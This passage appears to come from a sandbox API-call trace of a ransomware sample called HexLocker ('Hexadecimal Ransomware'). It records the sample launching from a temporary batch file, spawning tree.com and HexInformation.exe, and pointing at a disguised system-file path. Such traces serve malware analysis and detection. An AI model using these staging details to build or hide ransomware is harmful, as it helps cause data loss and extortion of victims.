(_String1="HexLocker.exe", _String2="REM") returned -10 [0117.460] _wcsnicmp (_String1="HexL", _String2="cmd ", _MaxCount=0x4) returned 5 [0117.460] malloc (_Size=0xffce) returned 0x1dc25828160 [0117.461] ??_V@YAXPEAX@Z () returned 0x1dc25828160 [0117.461] GetProcessHeap () returned 0x1dc256b0000 [0117.461] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256db7b0 [0117.463] SetErrorMode (uMode=0x0) returned 0x0 [0117.463] SetErrorMode (uMode=0x1) returned 0x0 [0117.463] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1dc256db7c0, lpFilePart=0x407419e130 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419e130*="Desktop") returned 0x17 [0117.463] SetErrorMode (uMode=0x0) returned 0x1 [0117.463] GetProcessHeap () returned 0x1dc256b0000 [0117.463] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256db7b0, Size=0x5c) returned 0x1dc256db7b0 [0117.463] GetProcessHeap () returned 0x1dc256b0000 [0117.463] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256db7b0) returned 0x5c [0117.463] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0117.464] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0117.464] GetProcessHeap () returned 0x1dc256b0000 [0117.464] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1bc) returned 0x1dc256bd2a0 [0117.464] GetProcessHeap () returned 0x1dc256b0000 [0117.464] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x368) returned 0x1dc256bf990 [0117.464] GetProcessHeap () returned 0x1dc256b0000 [0117.464] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bf990, Size=0x1be) returned 0x1dc256bf990 [0117.464] GetProcessHeap () returned 0x1dc256b0000 [0117.464] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bf990) returned 0x1be [0117.464] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.464] GetProcessHeap () returned 0x1dc256b0000 [0117.464] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256c6450 [0117.464] GetProcessHeap () returned 0x1dc256b0000 [0117.464] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c6450, Size=0x7e) returned 0x1dc256c09d0 [0117.464] GetProcessHeap () returned 0x1dc256b0000 [0117.464] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c09d0) returned 0x7e [0117.464] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.464] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", fInfoLevelId=0x1, lpFindFileData=0x407419dea0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419dea0) returned 0x1dc256bea20 [0117.465] FindClose (in: hFindFile=0x1dc256bea20 | out: hFindFile=0x1dc256bea20) returned 1 [0117.465] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0117.465] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0117.465] ??_V@YAXPEAX@Z () returned 0x1 [0117.466] GetStartupInfoW (in: lpStartupInfo=0x407419e520 | out: lpStartupInfo=0x407419e520*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0117.466] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x407419e488 | out: lpAttributeList=0x0, lpSize=0x407419e488) returned 0 [0117.466] GetLastError () returned 0x7a [0117.466] GetProcessHeap () returned 0x1dc256b0000 [0117.466] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x48) returned 0x1dc256bf5e0 [0117.466] InitializeProcThreadAttributeList (in: lpAttributeList=0x1dc256bf5e0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x407419e488 | out: lpAttributeList=0x1dc256bf5e0, lpSize=0x407419e488) returned 1 [0117.466] UpdateProcThreadAttribute (in: lpAttributeList=0x1dc256bf5e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x407419e484, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1dc256bf5e0, lpPreviousValue=0x0) returned 1 [0117.466] CreateProcessW (in: lpApplicationName="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", lpCommandLine="HexLocker.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x407419e4b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4c, hStdOutput=0x50, hStdError=0x54), lpProcessInformation=0x407419e490 | out: lpCommandLine="HexLocker.exe ", lpProcessInformation=0x407419e490*(hProcess=0x9c, hThread=0xa0, dwProcessId=0xa94, dwThreadId=0xe08)) returned 1 [0117.951] DeleteProcThreadAttributeList (in: lpAttributeList=0x1dc256bf5e0 | out: lpAttributeList=0x1dc256bf5e0) [0117.951] GetProcessHeap () returned 0x1dc256b0000 [0117.951] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf5e0) returned 1 [0117.951] GetLastError () returned 0x7a [0117.951] ResumeThread (hThread=0xa0) returned 0x0 [0117.951] CloseHandle (hObject=0xa0) returned 1 [0117.951] CloseHandle (hObject=0x9c) returned 1 [0117.951] ??_V@YAXPEAX@Z () returned 0x1 [0117.952] ??_V@YAXPEAX@Z () returned 0x1 [0117.952] ??_V@YAXPEAX@Z () returned 0x1 [0117.953] ??_V@YAXPEAX@Z () returned 0x1 [0117.954] ??_V@YAXPEAX@Z () returned 0x1 [0117.956] ??_V@YAXPEAX@Z () returned 0x1 [0117.957] ??_V@YAXPEAX@Z () returned 0x1 [0117.958] ??_V@YAXPEAX@Z () returned 0x1 [0117.966] ??_V@YAXPEAX@Z () returned 0x1 [0117.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0117.970] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0118.755] _get_osfhandle (_FileHandle=1) returned 0x50 [0118.755] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0119.159] _get_osfhandle (_FileHandle=0) returned 0x4c [0119.159] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0119.742] SetConsoleInputExeNameW () returned 0x1 [0119.742] GetConsoleOutputCP () returned 0x1b5 [0120.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0120.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.161] ??_V@YAXPEAX@Z () returned 0x1 [0120.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0120.165] _open_osfhandle (_OSFileHandle=0x9c, _Flags=8) returned 3 [0120.165] _get_osfhandle (_FileHandle=3) returned 0x9c [0120.165] SetFilePointer (in: hFile=0x9c, lDistanceToMove=485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e5 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c09d0) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd2a0) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256db7b0) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf360) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2b50) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c28d0) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c32f0) returned 1 [0120.165] GetProcessHeap () returned 0x1dc256b0000 [0120.165] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0120.166] _get_osfhandle (_FileHandle=3) returned 0x9c [0120.166] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e5 [0120.166] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x4, lpOverlapped=0x0) returned 1 [0120.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=4, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="exitt HexLocker.exe\r\ne\r\n\r\nktop\r\ne%\\desktop\\HexLocker.exe\r\nexe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 4 [0120.167] GetProcessHeap () returned 0x1dc256b0000 [0120.167] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256db7b0 [0120.167] GetProcessHeap () returned 0x1dc256b0000 [0120.167] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256db7b0) returned 1 [0120.169] _get_osfhandle (_FileHandle=3) returned 0x9c [0120.169] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e9 [0120.169] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x0, lpOverlapped=0x0) returned 1 [0120.169] GetLastError () returned 0x0 [0120.169] _get_osfhandle (_FileHandle=3) returned 0x9c [0120.169] GetFileType (hFile=0x9c) returned 0x1 [0120.169] _get_osfhandle (_FileHandle=3) returned 0x9c [0120.169] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1e9 [0120.169] GetProcessHeap () returned 0x1dc256b0000 [0120.169] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256db7b0 [0120.171] GetProcessHeap () returned 0x1dc256b0000 [0120.171] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256db7b0) returned 1 [0120.172] _wcsicmp (_String1="exit", _String2=")") returned 60 [0120.172] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0120.172] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0120.172] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0120.172] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0120.172] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0120.172] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0120.172] GetProcessHeap () returned 0x1dc256b0000 [0120.172] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0120.172] GetProcessHeap () returned 0x1dc256b0000 [0120.172] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256c32f0 [0120.173] _tell (_FileHandle=3) returned 489 [0120.173] _close (_FileHandle=3) returned 0 [0120.173] malloc (_Size=0xffce) returned 0x1dc257e0160 [0120.175] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0120.175] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0120.175] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0120.175] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0120.176] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0120.176] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0120.176] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0120.176] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0120.176] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0120.176] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0120.176] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0120.176] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0120.176] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0120.176] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0120.176] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0120.176] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0120.176] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0120.176] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0120.176] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0120.176] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0120.176] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0120.176] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0120.176] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0120.176] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0120.176] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0120.176] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0120.176] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0120.176] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0120.176] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0120.176] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0120.279] malloc (_Size=0xffce) returned 0x1dc257f0140 [0120.279] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0120.280] malloc (_Size=0xffce) returned 0x1dc25800120 [0120.280] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0120.280] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0120.280] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0120.280] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0120.280] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0120.280] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0120.280] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0120.280] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0120.280] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0120.281] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0120.281] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0120.281] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0120.281] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0120.281] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0120.281] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0120.281] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0120.281] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0120.281] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0120.281] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0120.281] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0120.281] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0120.281] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0120.281] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0120.281] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0120.281] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0120.281] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0120.281] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0120.281] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0120.281] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0120.281] ??_V@YAXPEAX@Z () returned 0x1 [0120.283] GetProcessHeap () returned 0x1dc256b0000 [0120.283] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x14) returned 0x1dc256c4310 [0120.283] GetProcessHeap () returned 0x1dc256b0000 [0120.283] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256c3380 [0120.283] exit (_Code=0) Thread: id = 26 os_tid = 0x53c Process: id = "4" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x11f1c000" os_pid = "0x1280" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x1284 Thread: id = 22 os_tid = 0x1288 Thread: id = 23 os_tid = 0x128c Thread: id = 24 os_tid = 0xe6c Thread: id = 25 os_tid = 0x6d0 Process: id = "5" image_name = "tree.com" filename = "c:\\windows\\system32\\tree.com" page_root = "0xc336000" os_pid = "0xe04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "tree" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0x1210 Thread: id = 28 os_tid = 0x994 Process: id = "6" image_name = "tree.com" filename = "c:\\windows\\system32\\tree.com" page_root = "0x36816000" os_pid = "0x1a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "tree" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 29 os_tid = 0x258 Thread: id = 30 os_tid = 0x394 Process: id = "7" image_name = "tree.com" filename = "c:\\windows\\system32\\tree.com" page_root = "0x1fbef000" os_pid = "0x3e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "tree" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 31 os_tid = 0x908 Thread: id = 32 os_tid = 0xf0c Process: id = "8" image_name = "tree.com" filename = "c:\\windows\\system32\\tree.com" page_root = "0x1f748000" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "tree" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0xfc4 Thread: id = 34 os_tid = 0x4fc Process: id = "9" image_name = "tree.com" filename = "c:\\windows\\system32\\tree.com" page_root = "0x1f621000" os_pid = "0x4b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "tree" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 35 os_tid = 0x390 Thread: id = 36 os_tid = 0x550 Process: id = "10" image_name = "hexinformation.exe" filename = "c:\\users\\fd1hvy\\desktop\\hexinformation.exe" page_root = "0x6fae9000" os_pid = "0x97c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "HexInformation.exe " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0x778 [0124.281] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0124.593] RoInitialize () returned 0x1 [0124.594] RoUninitialize () returned 0x0 [0134.388] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x11fe560 | out: phkResult=0x11fe560*=0x0) returned 0x2 [0134.388] RegCloseKey (hKey=0x80000002) returned 0x0 [0134.890] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x11fe7b8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0135.055] IsAppThemed () returned 0x1 [0135.067] CoTaskMemAlloc (cb=0xf0) returned 0x153b1f0 [0135.067] CreateActCtxA (pActCtx=0x11fed08) returned 0x153972c [0135.620] CoTaskMemFree (pv=0x153b1f0) [0135.638] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1aa [0135.638] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1af [0140.561] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config", nBufferLength=0x105, lpBuffer=0x11fe624, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config", lpFilePart=0x0) returned 0x31 [0142.014] GetCurrentProcess () returned 0xffffffff [0142.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fe98c | out: TokenHandle=0x11fe98c*=0x2cc) returned 1 [0142.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x11fe418, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0142.024] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x11fe984 | out: lpFileInformation=0x11fe984*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0142.026] GetFullPathNameW (in: 